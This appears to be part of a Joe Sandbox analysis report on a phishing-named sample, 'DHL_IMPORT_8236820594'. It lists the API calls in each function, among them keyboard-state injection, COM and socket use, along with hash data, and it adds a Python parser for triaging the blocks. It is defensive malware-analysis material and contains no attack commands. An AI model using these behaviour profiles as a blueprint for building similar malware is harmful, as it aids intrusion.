                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ObjectSelect$BeginCreatePath
                                                                                          • String ID:
                                                                                          • API String ID: 3225163088-0
                                                                                          • Opcode ID: d07e91aba393e10b44417a081115147c47e31e340c629e93c1c46750174ea05d
                                                                                          • Instruction ID: 45c45fa38699200a766a1bfabce7db86a6f10474a21a4f7df4604bef67b572de
                                                                                          • Opcode Fuzzy Hash: d07e91aba393e10b44417a081115147c47e31e340c629e93c1c46750174ea05d
                                                                                          • Instruction Fuzzy Hash: C7914A72D01259EFCB10CFAACC88AEEBBB8FF49320F144455E515B7291D778A951CB60
APIs
• VariantInit.OLEAUT32(?), ref: 0085396B
• CharUpperBuffW.USER32(?,?), ref: 00853A7A
• _wcslen.LIBCMT ref: 00853A8A
• VariantClear.OLEAUT32(?), ref: 00853C1F
  • Part of subcall function 00840CDF: VariantInit.OLEAUT32(00000000), ref: 00840D1F
  • Part of subcall function 00840CDF: VariantCopy.OLEAUT32(?,?), ref: 00840D28
  • Part of subcall function 00840CDF: VariantClear.OLEAUT32(?), ref: 00840D34
Strings
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4137639002-1221869570
• Opcode ID: 96897c4052c536c1199803072d152937c048bb2660e38bdf1534f4753b8aa4bd
• Instruction ID: a2e977c3712cda161c6f5caabc69751585f8c6c49774a3afb17bbb30ecb99c0e
• Opcode Fuzzy Hash: 96897c4052c536c1199803072d152937c048bb2660e38bdf1534f4753b8aa4bd
• Instruction Fuzzy Hash: 0C9135746083059FC704DF28C48496AB7E4FB88355F14892EF88ADB351DB35EE49CB92
APIs
  • Part of subcall function 0083000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?,?,0083035E), ref: 0083002B
  • Part of subcall function 0083000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830046
  • Part of subcall function 0083000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?,?), ref: 00830054
  • Part of subcall function 0083000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0082FF41,80070057,?), ref: 00830064
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00854C51
• _wcslen.LIBCMT ref: 00854D59
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00854DCF
• CoTaskMemFree.OLE32(?), ref: 00854DDA
Strings
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 614568839-2785691316
• Opcode ID: c25f1c70eeb2c0f28742ddc7ff82b3407e3610ecf60d208671bb89f14eaaa119
• Instruction ID: 0ef9af7b78b3435bdfb94f14a2d895c0998d34c4e7f55b9f0dddd075015d698d
• Opcode Fuzzy Hash: c25f1c70eeb2c0f28742ddc7ff82b3407e3610ecf60d208671bb89f14eaaa119
• Instruction Fuzzy Hash: EF912571D0021DEBDF14DFA4D895AEEB7B9FF08314F10416AE915A7241DB749A488FA0
APIs
• GetMenu.USER32(?), ref: 00862183
• GetMenuItemCount.USER32(00000000), ref: 008621B5
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008621DD
• _wcslen.LIBCMT ref: 00862213
• GetMenuItemID.USER32(?,?), ref: 0086224D
• GetSubMenu.USER32(?,?), ref: 0086225B
  • Part of subcall function 00833A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00833A57
  • Part of subcall function 00833A3D: GetCurrentThreadId.KERNEL32 ref: 00833A5E
  • Part of subcall function 00833A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008325B3), ref: 00833A65
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008622E3
  • Part of subcall function 0083E97B: Sleep.KERNEL32 ref: 0083E9F3
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
• String ID:
• API String ID: 4196846111-0
• Opcode ID: 14451b9b5cb82651d7ee92ee28e0d06d231301ddb295e2bc22c7fc1d06586839
• Instruction ID: febd086a49c9af7690c9fa6cd96e1c527384f5bab03780f6919a889bad497dbd
• Opcode Fuzzy Hash: 14451b9b5cb82651d7ee92ee28e0d06d231301ddb295e2bc22c7fc1d06586839
• Instruction Fuzzy Hash: 52719E35A00605EFCB10EF68C845AAEB7F1FF88310F158499E816EB341DB34AD418B90
APIs
• IsWindow.USER32(00D95258), ref: 00867F37
• IsWindowEnabled.USER32(00D95258), ref: 00867F43
• SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0086801E
• SendMessageW.USER32(00D95258,000000B0,?,?), ref: 00868051
• IsDlgButtonChecked.USER32(?,?), ref: 00868089
• GetWindowLongW.USER32(00D95258,000000EC), ref: 008680AB
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 008680C3
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: MessageSendWindow$ButtonCheckedEnabledLong
• String ID:
• API String ID: 4072528602-0
• Opcode ID: b0b9a5028351c271e31bb2a480d1c99f25447954ced8c5992b155fbcdc78ff88
• Instruction ID: 833cd19092acd995fe1078d56b3fd9b903f10c64a8d081e14c3da3114af74b44
• Opcode Fuzzy Hash: b0b9a5028351c271e31bb2a480d1c99f25447954ced8c5992b155fbcdc78ff88
• Instruction Fuzzy Hash: 5771AD34608604EFEF219F64C884FBABBB5FF1A304F164459F949D7261CB71A844CBA1
APIs
• GetParent.USER32(?), ref: 0083AEF9
• GetKeyboardState.USER32(?), ref: 0083AF0E
• SetKeyboardState.USER32(?), ref: 0083AF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 0083AF9D
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0083AFBC
• PostMessageW.USER32(?,00000101,00000012,?), ref: 0083AFFD
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 0083B020
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: e4f938719305adf712c091431817855387f967b9e430f04aa95d4bf08474ee47
• Instruction ID: 766bda9168e31c1524a617da33e0fe3daf51bfb6adbed5f30f33571c9672291c
• Opcode Fuzzy Hash: e4f938719305adf712c091431817855387f967b9e430f04aa95d4bf08474ee47
• Instruction Fuzzy Hash: 5551D4E06047D53DFB3A4234C855BBB7EA9BB86304F088589E2D5D54C2C7D9ACC4D791
APIs
• GetParent.USER32(00000000), ref: 0083AD19
• GetKeyboardState.USER32(?), ref: 0083AD2E
• SetKeyboardState.USER32(?), ref: 0083AD8F
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0083ADBB
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0083ADD8
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0083AE17
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0083AE38
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 9986ddd006f1d9d25a7689df1b5ab0d81706676591777ce4098a0736795a0304
• Instruction ID: 0c2c83a70163d4fb53793d654cc225e22d0513a04fd23b5d79f5dac07d9064bf
• Opcode Fuzzy Hash: 9986ddd006f1d9d25a7689df1b5ab0d81706676591777ce4098a0736795a0304
• Instruction Fuzzy Hash: E751C5A15047D53DFB3A8364CC95B7A7E98BB86304F088588E1D5DA8C2D294EC84D792
APIs
• GetConsoleCP.KERNEL32(00813CD6,?,?,?,?,?,?,?,?,00805BA3,?,?,00813CD6,?,?), ref: 00805470
• __fassign.LIBCMT ref: 008054EB
• __fassign.LIBCMT ref: 00805506
• WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00813CD6,00000005,00000000,00000000), ref: 0080552C
• WriteFile.KERNEL32(?,00813CD6,00000000,00805BA3,00000000,?,?,?,?,?,?,?,?,?,00805BA3,?), ref: 0080554B
• WriteFile.KERNEL32(?,?,00000001,00805BA3,00000000,?,?,?,?,?,?,?,?,?,00805BA3,?), ref: 00805584
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: ee9587ce9a49a18ce64dcca420a0b60dd72f5a329c829853ad859da6bc1ee5f9
• Instruction ID: c19720c610a134a72035243b93f6e51ac2eb6081012cb6ef5a4689aa7cf4daac
• Opcode Fuzzy Hash: ee9587ce9a49a18ce64dcca420a0b60dd72f5a329c829853ad859da6bc1ee5f9
• Instruction Fuzzy Hash: A7519EB1A00649AFDB10CFA8DC95AEEBBF9FF09300F14411AE955E7291E6709A41CF60
APIs
• _ValidateLocalCookies.LIBCMT ref: 007F2D4B
• ___except_validate_context_record.LIBVCRUNTIME ref: 007F2D53
• _ValidateLocalCookies.LIBCMT ref: 007F2DE1
• __IsNonwritableInCurrentImage.LIBCMT ref: 007F2E0C
• _ValidateLocalCookies.LIBCMT ref: 007F2E61
Strings
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 6e10744f6f14a9225b37dbd3b5d75f2eea08f4195ead7ac205cd2eb1ea14ba41
• Instruction ID: 6d636b31da74532efb0ad8c9f674299e01809a997c425b987b0df01f6dafeb94
• Opcode Fuzzy Hash: 6e10744f6f14a9225b37dbd3b5d75f2eea08f4195ead7ac205cd2eb1ea14ba41
• Instruction Fuzzy Hash: 32419534B0020DEBCF14DF68C849AAEBBB5BF45364F148155EA14AB353D7399A06CBA1
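Every per-function block on this page follows one fixed layout: an APIs list whose entries are either direct calls or "Part of subcall function" entries, a Memory Dump Source list, the IDA plugin snapshot name, and a Similarity section carrying the API ID, String ID, opcode and instruction hashes. The Python below is an added example, not Joe Sandbox code, that parses that layout into records so the blocks can be queried during triage, for instance to list the functions that reach Winsock, or to find functions that Joe considers API-level clones. The SAMPLE input is an abbreviated copy of three blocks from this report (the two keyboard-state functions and the socket function). The reading of "API ID" as a signature derived from the set of API names is an assumption based on the identical IDs of those two keyboard-state blocks, not a documented Joe Sandbox property.

```python
"""Parse the per-function API blocks of a Joe Sandbox report (as rendered on this
page) into records that can be queried during triage.  Added example, not Joe Sandbox code."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# One API entry with its bullet stripped, e.g. "VariantInit.OLEAUT32(?), ref: 0085396B",
# "_wcslen.LIBCMT ref: 00853A8A" or "Part of subcall function 0085304E: inet_addr.WSOCK32(?), ref: 0085307A"
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?(?P<name>[\w$@?]+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                # address of the call site
    parent: Optional[int]   # sub-function the call sits in; None for a direct call

@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)  # "API ID", "Opcode ID", ...
    sources: List[str] = field(default_factory=list)      # memory dump file names

def parse_blocks(text: str) -> List[FunctionBlock]:
    """Start a new block at each 'APIs' heading and parse the sections that follow."""
    blocks: List[FunctionBlock] = []
    block, section = None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\u2022").strip()
        if not line:
            continue
        if line in HEADINGS:
            if line == "APIs":
                block = FunctionBlock()
                blocks.append(block)
            section = line
            continue
        if block is None:   # text before the first heading belongs to a cut-off block
            block = FunctionBlock()
            blocks.append(block)
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                parent = int(m["parent"], 16) if m["parent"] else None
                block.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), parent))
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key in ("Source File", "Associated"):
            # "Download File" is the page's link widget, not part of the dump file name
            block.sources.append(value.replace("Download File", "").strip())
        else:
            block.fields[key] = value
    return blocks

def direct_calls(block: FunctionBlock) -> List[str]:
    """APIs the function calls itself; 'Part of subcall' entries are one level down."""
    return [c.name for c in block.apis if c.parent is None]

def blocks_calling(blocks: List[FunctionBlock], names) -> List[int]:
    """Indices of blocks whose direct or sub-function calls hit any name in `names`."""
    wanted = set(names)
    return [i for i, b in enumerate(blocks) if wanted & {c.name for c in b.apis}]

def group_by_api_id(blocks: List[FunctionBlock]) -> Dict[str, List[int]]:
    """Group blocks by Joe's 'API ID'.  Assumption: the ID is derived from the set of API
    names, so equal IDs mark API-level clones even when opcode and fuzzy hashes differ."""
    groups: Dict[str, List[int]] = defaultdict(list)
    for i, b in enumerate(blocks):
        if b.fields.get("API ID"):
            groups[b.fields["API ID"]].append(i)
    return dict(groups)

# Abbreviated copy of three function blocks taken from this report.
SAMPLE = """\
APIs
• GetParent.USER32(?), ref: 0083AEF9
• GetKeyboardState.USER32(?), ref: 0083AF0E
• SetKeyboardState.USER32(?), ref: 0083AF6F
• PostMessageW.USER32(?,00000101,00000010,?), ref: 0083AF9D
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(00000000), ref: 0083AD19
• GetKeyboardState.USER32(?), ref: 0083AD2E
• SetKeyboardState.USER32(?), ref: 0083AD8F
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0083ADBB
Similarity
• API ID: MessagePost$KeyboardState$Parent
APIs
  • Part of subcall function 0085304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0085307A
  • Part of subcall function 0085304E: _wcslen.LIBCMT ref: 0085309B
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00851112
• closesocket.WSOCK32(00000000), ref: 008511F9
Memory Dump Source
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
"""
```

Feed the whole report text to parse_blocks and then call blocks_calling with the Winsock or OLE names of interest; group_by_api_id is the quick way to spot functions that Joe lists twice with the same call set, as the two keyboard-state functions above are, before spending time on their opcode hashes.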
                                                                                          APIs
                                                                                            • Part of subcall function 0085304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0085307A
                                                                                            • Part of subcall function 0085304E: _wcslen.LIBCMT ref: 0085309B
                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00851112
                                                                                          • WSAGetLastError.WSOCK32 ref: 00851121
                                                                                          • WSAGetLastError.WSOCK32 ref: 008511C9
                                                                                          • closesocket.WSOCK32(00000000), ref: 008511F9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                          • String ID:
                                                                                          • API String ID: 2675159561-0
                                                                                          • Opcode ID: 371e97c163c432d1a9ac3006f57f986caba3e78ae8a70b967a4d3319e6db6d6e
                                                                                          • Instruction ID: 18b738ecdf24ba230d3c835f431cfa3c537eb666be8a47fb4b4ccffe1bf86757
                                                                                          • Opcode Fuzzy Hash: 371e97c163c432d1a9ac3006f57f986caba3e78ae8a70b967a4d3319e6db6d6e
                                                                                          • Instruction Fuzzy Hash: EC412531200604AFDB109F24C889BA9BBE9FF44329F149099FD46DB291C774ED45CBE1
                                                                                          APIs
                                                                                            • Part of subcall function 0083DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0083CF22,?), ref: 0083DDFD
                                                                                            • Part of subcall function 0083DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0083CF22,?), ref: 0083DE16
                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0083CF45
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0083CF7F
                                                                                          • _wcslen.LIBCMT ref: 0083D005
                                                                                          • _wcslen.LIBCMT ref: 0083D01B
                                                                                          • SHFileOperationW.SHELL32(?), ref: 0083D061
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 3164238972-1173974218
                                                                                          • Opcode ID: 2d108c66ad98642950b1cdb0040f9bd460b6fb82b854cf9b1a4cd4ae16a8586c
                                                                                          • Instruction ID: 469b8e62aba40d65b8f6993f7b5aec0883aeadd0d1f1a89b644b69ef30f123c8
                                                                                          • Opcode Fuzzy Hash: 2d108c66ad98642950b1cdb0040f9bd460b6fb82b854cf9b1a4cd4ae16a8586c
                                                                                          • Instruction Fuzzy Hash: 3B4144719052189FDF12EBA4D985AEEB7B8FF48340F0000E6E605EB241EF74A644CB90
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00862E1C
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00862E4F
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00862E84
                                                                                          • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00862EB6
                                                                                          • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00862EE0
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00862EF1
                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00862F0B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: LongWindow$MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 2178440468-0
                                                                                          • Opcode ID: 4fea7e6b7e673537d62ee1a6282aeb5f6704a54d93d3d24ddfbef6bfcda30e2d
                                                                                          • Instruction ID: 4121c3f86b0d4ed78c05ac8fdfe5767e59b57baf5f400a1d1cd1bb4523b122b1
                                                                                          • Opcode Fuzzy Hash: 4fea7e6b7e673537d62ee1a6282aeb5f6704a54d93d3d24ddfbef6bfcda30e2d
                                                                                          • Instruction Fuzzy Hash: C13126306445409FEB20CF58DC88F6537E0FB6A710F1A01A5F951CF2B2CBB2A840DB01
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00837769
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0083778F
                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 00837792
                                                                                          • SysAllocString.OLEAUT32(?), ref: 008377B0
                                                                                          • SysFreeString.OLEAUT32(?), ref: 008377B9
                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 008377DE
                                                                                          • SysAllocString.OLEAUT32(?), ref: 008377EC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                          • String ID:
                                                                                          • API String ID: 3761583154-0
                                                                                          • Opcode ID: 5b6c3c082ce9f5e7c520facb80260bb6c75bd82e5fd9cdefd7c231803531cd45
                                                                                          • Instruction ID: 33ae849dcceafe28ceff1d92ac97d6c6e94b9fd3b88de25aef2213804349c67c
                                                                                          • Opcode Fuzzy Hash: 5b6c3c082ce9f5e7c520facb80260bb6c75bd82e5fd9cdefd7c231803531cd45
                                                                                          • Instruction Fuzzy Hash: D42192B6608219AFDB20DFA9CC88CBB77ACFB49764B058025F915DB150D670DC41C7A4
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00837842
                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00837868
                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 0083786B
                                                                                          • SysAllocString.OLEAUT32 ref: 0083788C
                                                                                          • SysFreeString.OLEAUT32 ref: 00837895
                                                                                          • StringFromGUID2.OLE32(?,?,00000028), ref: 008378AF
                                                                                          • SysAllocString.OLEAUT32(?), ref: 008378BD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
